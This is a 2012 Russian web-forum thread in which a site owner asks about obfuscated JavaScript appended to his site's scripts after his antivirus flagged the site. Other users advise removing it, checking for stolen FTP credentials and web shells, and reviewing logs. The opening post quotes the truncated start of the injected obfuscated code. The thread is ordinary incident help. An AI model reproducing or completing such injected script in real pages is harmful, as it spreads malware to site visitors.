Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
MySQL на примерах. Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В. Программирование. Ступени успешной карьеры. Авторы: Кузнецов М.В., Симдянов И.В. Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В. MySQL 5. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Разное

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: троян в javascript скрипте?
 
 автор: ZeeG   (04.04.2012 в 23:23)   письмо автору
 
 

Всем привет
Сегодня захожу на свой сайт и антивирус говорит, что сайт не безопасен. Смотрю в джаваскрипты и вижу, что в самом конце добавлены строки типа
var dd33630="";function i1960cf79e49(){var jed980b=String,f4817f6c3=Array.prototype.slice.call(arguments).join(""),f110e42=f4



что это и как это там появилось? Как бороться...Спасибо

  Ответить  
 
 автор: confirm   (05.04.2012 в 06:57)   письмо автору
 
   для: ZeeG   (04.04.2012 в 23:23)
 

Теперь это надо вырезать со страниц, и искать дыру в которой у вас возможна такая подстава.

  Ответить  
 
 автор: zeeg   (05.04.2012 в 10:44)   письмо автору
 
   для: confirm   (05.04.2012 в 06:57)
 

FileZilla может быть причиной?

  Ответить  
 
 автор: Valick   (05.04.2012 в 10:49)   письмо автору
 
   для: zeeg   (05.04.2012 в 10:44)
 

скорее всего не она у вас пароли профукала, а антивирус не поймал трояна, который и спер пароли
как вариант
какой у вас антивирус?
либо действительно дыра на сайте, тут нужен анализ кода, а это дорогое удовольствие

  Ответить  
 
 автор: ZeeG   (05.04.2012 в 14:57)   письмо автору
 
   для: Valick   (05.04.2012 в 10:49)
 

Яндекс версия на полгода

  Ответить  
 
 автор: confirm   (05.04.2012 в 11:03)   письмо автору
 
   для: zeeg   (05.04.2012 в 10:44)
 

Может, но не именно она виновата, а как сказали уже - сперли доступ ftp. Вам надо проверить свой серевер на наличие shell. А можно залить таковой и через дыру, которая может быть есть в скриптах ваших.

  Ответить  
 
 автор: ZeeG   (05.04.2012 в 15:23)   письмо автору
 
   для: confirm   (05.04.2012 в 11:03)
 

да нет в моих скриптах ничего особенного. не думаю, что там дырка есть.

  Ответить  
 
 автор: confirm   (05.04.2012 в 16:02)   письмо автору
 
   для: ZeeG   (05.04.2012 в 15:23)
 

Вы обнаружили что либо обясняющее механизм этого заражения, который и позволяет вам так думать?

  Ответить  
 
 автор: cheops   (07.04.2012 в 11:44)   письмо автору
 
   для: ZeeG   (05.04.2012 в 15:23)
 

Запрашивайте FTP-логи, и Web-логи, только по ним можно точно определить что произошло, но в 95% случаев троян на клиентской машине.

  Ответить  
 
 автор: Красная_шляпа   (11.04.2012 в 10:24)   письмо автору
 
   для: ZeeG   (04.04.2012 в 23:23)
 

Браузеры на каком движке ему подвержены?

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования